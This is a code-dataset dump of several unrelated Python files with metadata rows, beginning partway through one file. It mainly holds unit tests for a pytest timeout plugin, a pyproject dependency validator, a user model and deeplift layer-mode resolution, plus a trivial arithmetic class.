    # NOTE(review): "execucution" in this test's name looks like a typo,
    # but renaming would change the collected test id, so it is kept.
    testdir.makepyfile("""
import pytest
import time
@pytest.mark.execution_timeout(0.2)
def test_dummy():
    time.sleep(1)
""")
    result = testdir.runpytest('--strict')
    result.stdout.fnmatch_lines([
        '*Failed: Timeout >0.2s*'
    ])
def test_setup_marker_timeout(testdir):
    """The setup_timeout marker limits fixture setup time."""
    testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
    time.sleep(1)
    yield
@pytest.mark.setup_timeout(0.2)
def test_dummy(fx):
    time.sleep(1)
""")
    result = testdir.runpytest('--strict')
    result.stdout.fnmatch_lines([
        '*Failed: Timeout >0.2s*'
    ])
def test_teardown_marker_timeout(testdir):
    """The teardown_timeout marker limits fixture teardown time."""
    testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
    yield
    time.sleep(1)
@pytest.mark.teardown_timeout(0.2)
def test_dummy(fx):
    pass
""")
    result = testdir.runpytest('--strict')
    result.stdout.fnmatch_lines([
        '*Failed: Timeout >0.2s*'
    ])
def test_timeout_setting_order(testdir):
    """Default precedence across timeout sources.

    With ini values of 0.3 and a command-line --setup-timeout=0.1, the
    expected failures show that the marker (0.2) wins for teardown while
    the command-line option (0.1) wins over the setup marker (0.4).
    """
    testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
    yield
    time.sleep(1)
@pytest.fixture(scope='function')
def fx2():
    time.sleep(1)
    yield
@pytest.mark.teardown_timeout(0.2)
def test_dummy(fx):
    pass
@pytest.mark.setup_timeout(0.4)
def test_dummy2(fx2):
    pass
""")
    testdir.makeini("""
[pytest]
setup_timeout = 0.3
teardown_timeout = 0.3
""")
    result = testdir.runpytest('--setup-timeout=0.1')
    result.stdout.fnmatch_lines([
        '*Failed: Timeout >0.2s*',
        '*Failed: Timeout >0.1s*',
    ])
def test_timeout_override_order(testdir):
    """--timeouts-order=imo changes which timeout source takes precedence.

    The expected failures show the ini setup value (0.1) beating both the
    marker (0.4) and the command-line option (0.3), and the teardown
    marker (0.2) beating the command-line option (0.3).
    """
    testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
    yield
    time.sleep(1)
@pytest.fixture(scope='function')
def fx2():
    time.sleep(1)
    yield
@pytest.mark.teardown_timeout(0.2)
def test_dummy(fx):
    pass
@pytest.mark.setup_timeout(0.4)
def test_dummy_2(fx2):
    pass
""")
    testdir.makeini("""
[pytest]
setup_timeout = 0.1
""")
    result = testdir.runpytest(
        '--setup-timeout=0.3',
        '--teardown-timeout=0.3',
        '--timeouts-order=imo',
    )
    result.stdout.fnmatch_lines([
        '*Failed: Timeout >0.2s*',
        '*Failed: Timeout >0.1s*',
    ])
def test_disable_args_and_markers(testdir):
    """--timeouts-order=i restricts timeout sources to the ini file.

    Both expected failures use the ini value (0.1) even though markers
    (0.2, 0.4) and command-line options (0.3) are also supplied.
    """
    testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
    yield
    time.sleep(1)
@pytest.fixture(scope='function')
def fx2():
    time.sleep(1)
    yield
@pytest.mark.teardown_timeout(0.2)
def test_dummy(fx):
    pass
@pytest.mark.setup_timeout(0.4)
def test_dummy_2(fx2):
    pass
""")
    testdir.makeini("""
[pytest]
setup_timeout = 0.1
teardown_timeout = 0.1
""")
    result = testdir.runpytest(
        '--setup-timeout=0.3',
        '--teardown-timeout=0.3',
        '--timeouts-order=i',
    )
    result.stdout.fnmatch_lines([
        '*Failed: Timeout >0.1s*',
        '*Failed: Timeout >0.1s*',
    ])
def test_marker_value_missing(testdir):
    """A timeout marker with no value is reported as a TypeError."""
    testdir.makepyfile("""
import pytest
import time
@pytest.mark.execution_timeout()
def test_dummy():
    time.sleep(1)
""")
    result = testdir.runpytest()
    result.stdout.fnmatch_lines([
        '*TypeError:*'
    ])
def test_marker_value_invalid(testdir):
    """A non-numeric timeout marker value is reported as a ValueError."""
    testdir.makepyfile("""
import pytest
import time
@pytest.mark.execution_timeout('asdf')
def test_dummy():
    time.sleep(1)
""")
    result = testdir.runpytest()
    result.stdout.fnmatch_lines([
        '*ValueError:*'
    ])
def test_timeout_scope_fixture(testdir):
    """teardown_timeout markers can target specific fixture scopes.

    The generated module declares three module-level teardown_timeout
    markers: 0.12 for 'function' scope, 0.14 for 'module' scope and 0.13
    with the default scope, plus a per-test marker of 0.11 on
    test_dummy_4.  The expected failure sequence (0.12, 0.13, 0.11, 0.14)
    shows which timeout applies to each fixture's teardown.
    """
    testdir.makepyfile("""
import pytest
import time
pytestmark = [
    pytest.mark.teardown_timeout(0.12, 'function'),
    pytest.mark.teardown_timeout(0.14, 'module'),
    pytest.mark.teardown_timeout(0.13),
]
@pytest.fixture(scope='function')
def fx():
    yield
    time.sleep(1)
@pytest.fixture(scope='class')
def fx2():
    yield
    time.sleep(1)
@pytest.fixture(scope='module')
def fx3():
    yield
    time.sleep(1)
def test_dummy(fx):
    pass
def test_dummy_2(fx2):
    pass
@pytest.mark.teardown_timeout(0.11)
def test_dummy_4(fx):
    pass
def test_dummy_3(fx3):
    pass
""")
    testdir.makeini("""
[pytest]
teardown_timeout = 0.15
""")
    result = testdir.runpytest()
    result.stdout.fnmatch_lines([
        '*Failed: Timeout >0.12s*',
        '*Failed: Timeout >0.13s*',
        '*Failed: Timeout >0.11s*',
        '*Failed: Timeout >0.14s*',
    ])
def test_empty_timeout_order_should_show_error_on_startup(testdir):
    """An empty --timeouts-order value is rejected at startup."""
    # The expected message text (including "less then") must match the
    # plugin's actual output verbatim.
    testdir.makepyfile("""
import pytest
import time
def test_dummy():
    time.sleep(1)
""")
    result = testdir.runpytest(
        '--timeouts-order=',
    )
    result.stderr.fnmatch_lines([
        'ERROR: Order should have at least 1 and less then or equal 3 elements'
    ])
def test_4_timeout_order_item_should_show_error_on_startup(testdir):
    """A --timeouts-order value with four items is rejected at startup."""
    testdir.makepyfile("""
import pytest
import time
def test_dummy():
    time.sleep(1)
""")
    result = testdir.runpytest(
        '--timeouts-order=imoi',
    )
    result.stderr.fnmatch_lines([
        'ERROR: Order should have at least 1 and less then or equal 3 elements'
    ])
def test_incorrect_timeout_order_item_should_show_error_on_startup(testdir):
    """Unknown letters in --timeouts-order are rejected at startup."""
    testdir.makepyfile("""
import pytest
import time
def test_dummy():
    time.sleep(1)
""")
    result = testdir.runpytest(
        '--timeouts-order=xa',
    )
    result.stderr.fnmatch_lines([
        'ERROR: Incorrect item * in timeout order list'
    ])
| 21.012136 | 79 | 0.545801 | 925 | 8,657 | 4.963243 | 0.105946 | 0.074929 | 0.057504 | 0.098018 | 0.885428 | 0.84731 | 0.815726 | 0.743847 | 0.698105 | 0.674799 | 0 | 0.027901 | 0.32517 | 8,657 | 411 | 80 | 21.06326 | 0.75796 | 0 | 0 | 0.780952 | 0 | 0 | 0.63209 | 0.128798 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053968 | false | 0.047619 | 0.095238 | 0 | 0.149206 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b5792de3bbe9d498fd0dcb96797ed2df05b5c3b1 | 7,146 | py | Python | tests/test_dependencies.py | ofek/pyproject-validate | 7417874ed092770c076b44b57458135b32a2044d | [
"MIT"
] | 2 | 2022-02-21T18:04:50.000Z | 2022-02-22T04:03:46.000Z | tests/test_dependencies.py | ofek/pyproject-validate | 7417874ed092770c076b44b57458135b32a2044d | [
"MIT"
] | null | null | null | tests/test_dependencies.py | ofek/pyproject-validate | 7417874ed092770c076b44b57458135b32a2044d | [
"MIT"
] | null | null | null | class TestDependenciesInvalid:
BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"foo",
"",
"bar^0.1",
"baz",
]
"""
def test_error(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke()
assert result.code == 1, result.output
assert (
result.output
== """\
<<< dependencies >>>
error: dependencies #2: Parse error at "''": Expected W:(0-9A-Za-z)
error: dependencies #3: Parse error at "'^0.1'": Expected string_end
"""
)
def test_cannot_fix(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke("--fix")
assert result.code == 1, result.output
assert (
result.output
== """\
<<< dependencies >>>
error: dependencies #2: Parse error at "''": Expected W:(0-9A-Za-z)
error: dependencies #3: Parse error at "'^0.1'": Expected string_end
"""
)
class TestOptionalDependenciesInvalid:
    """Parse errors in optional-dependency groups are reported with the group name."""

    # pyproject.toml with valid core dependencies but an optional group
    # containing an empty string and unsupported "^" version syntax.
    BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"bar",
"foo",
]
[project.optional-dependencies]
foo = [
"foo",
"",
"bar^0.1",
"baz",
]
"""

    def test_error(self, project_file, invoke):
        """Validation exits 1 and reports each error with the group name."""
        project_file.write(self.BEFORE)
        result = invoke()
        assert result.code == 1, result.output
        assert (
            result.output
            == """\
<<< dependencies >>>
error: optional `foo` dependencies #2: Parse error at "''": Expected W:(0-9A-Za-z)
error: optional `foo` dependencies #3: Parse error at "'^0.1'": Expected string_end
"""
        )

    def test_cannot_fix(self, project_file, invoke):
        """--fix cannot repair parse errors; the same errors are reported."""
        project_file.write(self.BEFORE)
        result = invoke("--fix")
        assert result.code == 1, result.output
        assert (
            result.output
            == """\
<<< dependencies >>>
error: optional `foo` dependencies #2: Parse error at "''": Expected W:(0-9A-Za-z)
error: optional `foo` dependencies #3: Parse error at "'^0.1'": Expected string_end
"""
        )
class TestDependenciesNormalization:
    """Dependency strings are normalized (name casing, extras, specifier) and sorted."""

    # Input with non-canonical names/extras/markers.
    BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"python-dateutil",
"bAr.Baz[TLS] >=1.2RC5",
'Foo;python_version<"3.8"',
]
"""

    # Expected file after --fix: normalized requirement strings, sorted.
    AFTER = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"bar-baz[tls]>=1.2rc5",
"foo; python_version < '3.8'",
"python-dateutil",
]
"""

    def test_error(self, project_file, invoke):
        """Validation exits 1 and shows the normalized form of each entry."""
        project_file.write(self.BEFORE)
        result = invoke()
        assert result.code == 1, result.output
        assert (
            result.output
            == """\
<<< dependencies >>>
error: dependencies #2 should be: bar-baz[tls]>=1.2rc5
error: dependencies #3 should be: foo; python_version < '3.8'
"""
        )

    def test_fix(self, project_file, invoke):
        """--fix rewrites the file to AFTER and a re-run is clean."""
        project_file.write(self.BEFORE)
        result = invoke("--fix")
        assert result.code == 0, result.output
        assert not result.output
        assert project_file.read() == self.AFTER
        result = invoke()
        assert result.code == 0, result.output
        assert not result.output
class TestOptionalDependenciesNormalization:
    """Optional-dependency groups are normalized and sorted like core dependencies."""

    # Input whose optional `foo` group has non-canonical names/extras/markers.
    BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"bar",
"foo",
]
[project.optional-dependencies]
foo = [
"python-dateutil",
"bAr.Baz[TLS]>=1.2RC5",
'Foo; python_version < "3.8"',
]
"""

    # Expected file after --fix: group entries normalized and sorted.
    AFTER = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"bar",
"foo",
]
[project.optional-dependencies]
foo = [
"bar-baz[tls]>=1.2rc5",
"foo; python_version < '3.8'",
"python-dateutil",
]
"""

    def test_error(self, project_file, invoke):
        """Validation exits 1 and shows normalized forms with the group name."""
        project_file.write(self.BEFORE)
        result = invoke()
        assert result.code == 1, result.output
        assert (
            result.output
            == """\
<<< dependencies >>>
error: optional `foo` dependencies #2 should be: bar-baz[tls]>=1.2rc5
error: optional `foo` dependencies #3 should be: foo; python_version < '3.8'
"""
        )

    def test_fix(self, project_file, invoke):
        """--fix rewrites the file to AFTER and a re-run is clean."""
        project_file.write(self.BEFORE)
        result = invoke("--fix")
        assert result.code == 0, result.output
        assert not result.output
        assert project_file.read() == self.AFTER
        result = invoke()
        assert result.code == 0, result.output
        assert not result.output
class TestDependenciesSorting:
    """Unsorted [project] dependencies are flagged and sorted by --fix."""

    # Input with dependencies out of order.
    BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"foo",
"bar",
]
"""

    # Expected file after --fix: dependencies sorted.
    AFTER = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"bar",
"foo",
]
"""

    def test_error(self, project_file, invoke):
        """Validation exits 1 and reports the unsorted list."""
        project_file.write(self.BEFORE)
        result = invoke()
        assert result.code == 1, result.output
        assert (
            result.output
            == """\
<<< dependencies >>>
error: dependencies are not sorted
"""
        )

    def test_fix(self, project_file, invoke):
        """--fix sorts the list in place and a re-run is clean."""
        project_file.write(self.BEFORE)
        result = invoke("--fix")
        assert result.code == 0, result.output
        assert not result.output
        assert project_file.read() == self.AFTER
        result = invoke()
        assert result.code == 0, result.output
        assert not result.output
class TestOptionalDependenciesSorting:
    """Unsorted optional-dependency groups are flagged and sorted by --fix."""

    # Input whose optional `foo` group is out of order.
    BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
[project.optional-dependencies]
foo = [
"foo",
"bar",
]
"""

    # Expected file after --fix: group entries sorted.
    AFTER = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
[project.optional-dependencies]
foo = [
"bar",
"foo",
]
"""

    def test_error(self, project_file, invoke):
        """Validation exits 1 and reports the unsorted group by name."""
        project_file.write(self.BEFORE)
        result = invoke()
        assert result.code == 1, result.output
        assert (
            result.output
            == """\
<<< dependencies >>>
error: optional `foo` dependencies are not sorted
"""
        )

    def test_fix(self, project_file, invoke):
        """--fix sorts the group in place and a re-run is clean."""
        project_file.write(self.BEFORE)
        result = invoke("--fix")
        assert result.code == 0, result.output
        assert not result.output
        assert project_file.read() == self.AFTER
        result = invoke()
        assert result.code == 0, result.output
        assert not result.output
| 19.261456 | 83 | 0.584243 | 796 | 7,146 | 5.179648 | 0.074121 | 0.093136 | 0.087315 | 0.061121 | 0.956585 | 0.953917 | 0.953917 | 0.953917 | 0.953917 | 0.953917 | 0 | 0.020393 | 0.258886 | 7,146 | 370 | 84 | 19.313514 | 0.758119 | 0 | 0 | 0.857143 | 0 | 0.019934 | 0.472432 | 0.035125 | 0 | 0 | 0 | 0 | 0.119601 | 1 | 0.039867 | false | 0 | 0 | 0 | 0.093023 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a90bdc0ed8fbfbdaeb7cdc4865510ff666d8745e | 58 | py | Python | pygameloop/__init__.py | gaming32/pygameloop | a3bb926a0e4504ef669cabe67ae7f1ac61933197 | [
"MIT"
] | null | null | null | pygameloop/__init__.py | gaming32/pygameloop | a3bb926a0e4504ef669cabe67ae7f1ac61933197 | [
"MIT"
] | null | null | null | pygameloop/__init__.py | gaming32/pygameloop | a3bb926a0e4504ef669cabe67ae7f1ac61933197 | [
"MIT"
] | null | null | null | from .pygameloop import *
from .pygameloop import __all__
| 19.333333 | 31 | 0.810345 | 7 | 58 | 6.142857 | 0.571429 | 0.651163 | 0.930233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 58 | 2 | 32 | 29 | 0.86 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a92a54c9f1fe9f5bbfb9d73eb6f2153bbf92847a | 82 | py | Python | backend/handler/file/__init__.py | felixu1992/testing-platform | d7008343c25ec7f47acb670ae5c9b9b5f0593d63 | [
"Apache-2.0"
] | null | null | null | backend/handler/file/__init__.py | felixu1992/testing-platform | d7008343c25ec7f47acb670ae5c9b9b5f0593d63 | [
"Apache-2.0"
] | null | null | null | backend/handler/file/__init__.py | felixu1992/testing-platform | d7008343c25ec7f47acb670ae5c9b9b5f0593d63 | [
"Apache-2.0"
] | null | null | null | from backend.handler.file import file
from backend.handler.file import file_group
| 27.333333 | 43 | 0.853659 | 13 | 82 | 5.307692 | 0.461538 | 0.318841 | 0.521739 | 0.637681 | 0.927536 | 0.927536 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 82 | 2 | 44 | 41 | 0.932432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
8d394b203aa1fda414ffca14636e53b41a89f49c | 1,697 | py | Python | _core/domain/test_user.py | pachecobruno/python-ddd | 81812848a567d4605df346ef3630718d320706cc | [
"MIT"
] | null | null | null | _core/domain/test_user.py | pachecobruno/python-ddd | 81812848a567d4605df346ef3630718d320706cc | [
"MIT"
] | null | null | null | _core/domain/test_user.py | pachecobruno/python-ddd | 81812848a567d4605df346ef3630718d320706cc | [
"MIT"
] | null | null | null | from uuid import uuid4, UUID
from datetime import datetime
from core.domain.user import User
first_name = 'Bruno'
last_name = 'Pacheco'
alias = 'brunopacheco'
email = 'bruno@hubbe.co'
password = 'mypass123'
account = uuid4()
date = datetime.utcnow()
def test_user_model_init():
user = User(
first_name=first_name,
last_name=last_name,
alias=alias,
email=email,
password=password,
account=account
)
assert UUID(str(user.uuid), version=4)
assert user.first_name == first_name
assert user.last_name == last_name
assert user.alias == alias
assert user.email == email
assert user.password == password
assert user.account == account
assert user.public_key.split('.')[1] == user.uuid
assert user.secret_key.split('.')[0] == 'sk'
assert user.settings == {}
assert user.created_at < date
assert user.updated_at < date
def test_account_model_from_dict():
user = User.from_dict(
{
'first_name': first_name,
'last_name': last_name,
'alias': alias,
'email': email,
'password': password,
'account': account,
# 'settings': {},
}
)
assert UUID(str(user.uuid), version=4)
assert user.first_name == first_name
assert user.last_name == last_name
assert user.alias == alias
assert user.email == email
assert user.password == password
assert user.account == account
assert user.public_key.split('.')[1] == user.uuid
assert user.secret_key.split('.')[0] == 'sk'
assert user.settings == {}
assert user.created_at < date
assert user.updated_at < date
| 25.712121 | 53 | 0.62581 | 210 | 1,697 | 4.895238 | 0.204762 | 0.214008 | 0.070039 | 0.070039 | 0.745136 | 0.741245 | 0.741245 | 0.741245 | 0.741245 | 0.741245 | 0 | 0.008703 | 0.255156 | 1,697 | 65 | 54 | 26.107692 | 0.804589 | 0.008839 | 0 | 0.444444 | 0 | 0 | 0.058929 | 0 | 0 | 0 | 0 | 0 | 0.444444 | 1 | 0.037037 | false | 0.092593 | 0.055556 | 0 | 0.092593 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
8d3bbd9098b4696c51428e56b999cfc184a440cc | 34 | py | Python | languages/python.py | LCordial/github-rainbow | 0897daaca6a2e73ddd2ba6aa60aff694c9a1a94d | [
"MIT"
] | 3 | 2022-03-28T03:47:25.000Z | 2022-03-28T04:34:03.000Z | languages/python.py | LCordial/github-rainbow | 0897daaca6a2e73ddd2ba6aa60aff694c9a1a94d | [
"MIT"
] | 1 | 2022-03-30T00:31:24.000Z | 2022-03-30T00:31:24.000Z | languages/python.py | LCordial/the-helloworld-encyclopedia | 0897daaca6a2e73ddd2ba6aa60aff694c9a1a94d | [
"MIT"
] | null | null | null | #28/03/2022
print("Hello World"); | 11.333333 | 21 | 0.676471 | 6 | 34 | 3.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258065 | 0.088235 | 34 | 3 | 21 | 11.333333 | 0.483871 | 0.294118 | 0 | 0 | 0 | 0 | 0.458333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
8d740b25523aef072420efe600a56846fbcbc132 | 65 | py | Python | polls/generator.py | sebnorth/extended_user | 2107011fcbf1d380361af73787ef02f24c2d2850 | [
"BSD-3-Clause"
] | null | null | null | polls/generator.py | sebnorth/extended_user | 2107011fcbf1d380361af73787ef02f24c2d2850 | [
"BSD-3-Clause"
] | null | null | null | polls/generator.py | sebnorth/extended_user | 2107011fcbf1d380361af73787ef02f24c2d2850 | [
"BSD-3-Clause"
] | null | null | null | import random
def randomf():
    """Return a uniformly random integer between 1 and 100 inclusive."""
    value = random.randint(1, 100)
    return value
| 13 | 33 | 0.692308 | 9 | 65 | 5 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0.2 | 65 | 4 | 34 | 16.25 | 0.788462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
572f644caf6b040f5f3bb6d2ec7463593ef72f0b | 7,158 | py | Python | tests/layers/test_deeplift_genomics_default_mode.py | ViktorvdValk/deeplift | 9ac739ea5b7a14135b4f2d468b5a738edfe92eba | [
"MIT"
] | 640 | 2016-06-01T02:41:38.000Z | 2022-03-25T15:19:15.000Z | tests/layers/test_deeplift_genomics_default_mode.py | ViktorvdValk/deeplift | 9ac739ea5b7a14135b4f2d468b5a738edfe92eba | [
"MIT"
] | 95 | 2016-09-07T07:31:08.000Z | 2022-03-21T21:43:57.000Z | tests/layers/test_deeplift_genomics_default_mode.py | ViktorvdValk/deeplift | 9ac739ea5b7a14135b4f2d468b5a738edfe92eba | [
"MIT"
] | 165 | 2016-06-09T17:59:56.000Z | 2022-03-30T15:15:36.000Z | from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import unittest
from unittest import skip
from nose.tools import raises
import sys
import os
import numpy as np
np.random.seed(1234)
import deeplift.layers as layers
from deeplift.util import compile_func
from deeplift.layers import ConvMxtsMode, DenseMxtsMode, NonlinearMxtsMode
from deeplift.layers.convolutional import PaddingMode, PoolMode
class TestDense(unittest.TestCase):
    """Checks how NonlinearMxtsMode.DeepLIFT_GenomicsDefault is resolved.

    Per these tests: a ReLU preceded (possibly through batch norm / NoOp
    layers) by a Dense layer resolves to RevealCancel, one preceded by a
    conv layer resolves to Rescale, and a ReLU with no preceding linear
    layer raises RuntimeError.
    """

    def _make_dense(self):
        # Dense layer fed by a (None, 4) input; weights are random because
        # only the graph topology matters for mode resolution.
        input_layer = layers.Input(batch_shape=(None,4))
        dense_layer = layers.Dense(kernel=np.random.random((4,2)),
                                   bias=np.random.random((2,)),
                                   dense_mxts_mode=DenseMxtsMode.Linear)
        dense_layer.set_inputs(input_layer)
        return dense_layer

    def _make_batch_norm(self, upstream):
        # Batch norm with gamma=1/var=1 attached to *upstream*; the exact
        # statistics are irrelevant to mode resolution.
        batch_norm = layers.BatchNormalization(
            gamma=np.array([1.0, 1.0]).astype("float32"),
            beta=np.array([-0.5, 0.5]).astype("float32"),
            axis=-1,
            mean=np.array([-0.5, 0.5]).astype("float32"),
            var=np.array([1.0, 1.0]).astype("float32"),
            epsilon=0.001)
        batch_norm.set_inputs(upstream)
        return batch_norm

    def _make_conv1d(self):
        # Minimal valid-padded Conv1D on a (None, 2, 2) input.
        input_layer = layers.Input(batch_shape=(None,2,2))
        conv_layer = layers.Conv1D(
            kernel=np.random.random((2,2,2)).astype("float32"),
            bias=np.random.random((2,)).astype("float32"),
            conv_mxts_mode=ConvMxtsMode.Linear,
            stride=1,
            padding=PaddingMode.valid)
        conv_layer.set_inputs(input_layer)
        return conv_layer

    def _make_conv2d(self):
        # Minimal valid-padded channels-last Conv2D on a (None, 2, 2, 2) input.
        input_layer = layers.Input(batch_shape=(None,2,2,2))
        conv_layer = layers.Conv2D(
            kernel=np.random.random((2,2,2,2)).astype("float32"),
            bias=np.random.random((2,)).astype("float32"),
            conv_mxts_mode=ConvMxtsMode.Linear,
            strides=(1,1),
            padding=PaddingMode.valid,
            data_format="channels_last")
        conv_layer.set_inputs(input_layer)
        return conv_layer

    def _assert_resolved_mode(self, upstream, expected_mode):
        # Attach a GenomicsDefault ReLU to *upstream*, build the forward
        # graph, and verify which concrete mxts mode the ReLU settled on.
        relu = layers.ReLU(nonlinear_mxts_mode=
                           NonlinearMxtsMode.DeepLIFT_GenomicsDefault)
        relu.set_inputs(upstream)
        relu.build_fwd_pass_vars()
        self.assertEqual(relu.nonlinear_mxts_mode, expected_mode)

    def test_relu_after_dense(self):
        self._assert_resolved_mode(self._make_dense(),
                                   NonlinearMxtsMode.RevealCancel)

    def test_relu_after_dense_batchnorm_noop_noop(self):
        # Batch norm and NoOp layers must be transparent to mode resolution.
        batch_norm = self._make_batch_norm(self._make_dense())
        noop_layer1 = layers.NoOp()
        noop_layer1.set_inputs(batch_norm)
        noop_layer2 = layers.NoOp()
        noop_layer2.set_inputs(noop_layer1)
        self._assert_resolved_mode(noop_layer2,
                                   NonlinearMxtsMode.RevealCancel)

    def test_relu_after_conv1d(self):
        self._assert_resolved_mode(self._make_conv1d(),
                                   NonlinearMxtsMode.Rescale)

    def test_relu_after_conv1d_batchnorm(self):
        self._assert_resolved_mode(self._make_batch_norm(self._make_conv1d()),
                                   NonlinearMxtsMode.Rescale)

    def test_relu_after_conv2d(self):
        self._assert_resolved_mode(self._make_conv2d(),
                                   NonlinearMxtsMode.Rescale)

    def test_relu_after_conv2d_batchnorm(self):
        self._assert_resolved_mode(self._make_batch_norm(self._make_conv2d()),
                                   NonlinearMxtsMode.Rescale)

    @raises(RuntimeError)
    def test_relu_after_other_layer(self):
        # A ReLU placed directly on the input has no preceding linear layer,
        # so GenomicsDefault cannot be resolved and must raise.
        input_layer = layers.Input(batch_shape=(None,4))
        relu_layer = layers.ReLU(
            nonlinear_mxts_mode=
            NonlinearMxtsMode.DeepLIFT_GenomicsDefault)
        relu_layer.set_inputs(input_layer)
        relu_layer.build_fwd_pass_vars()
| 48.364865 | 80 | 0.583403 | 791 | 7,158 | 4.982301 | 0.121365 | 0.070794 | 0.056077 | 0.112154 | 0.832276 | 0.822634 | 0.815529 | 0.813245 | 0.803096 | 0.752093 | 0 | 0.033627 | 0.318664 | 7,158 | 147 | 81 | 48.693878 | 0.774452 | 0 | 0 | 0.724638 | 0 | 0 | 0.023191 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.050725 | false | 0.050725 | 0.094203 | 0 | 0.152174 | 0.007246 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
93bbeee184833d8c0253fa96b40d4744b7077186 | 110 | py | Python | clases.py | Danieldevop/Python-examples | 9ff038c80c6a2edc82ffafbf74a33084d64ff7a8 | [
"MIT"
] | null | null | null | clases.py | Danieldevop/Python-examples | 9ff038c80c6a2edc82ffafbf74a33084d64ff7a8 | [
"MIT"
] | null | null | null | clases.py | Danieldevop/Python-examples | 9ff038c80c6a2edc82ffafbf74a33084d64ff7a8 | [
"MIT"
] | null | null | null | class numeros:
def sumar(self, a,b):
return a + b
def restar(self,a,b):
return a - b
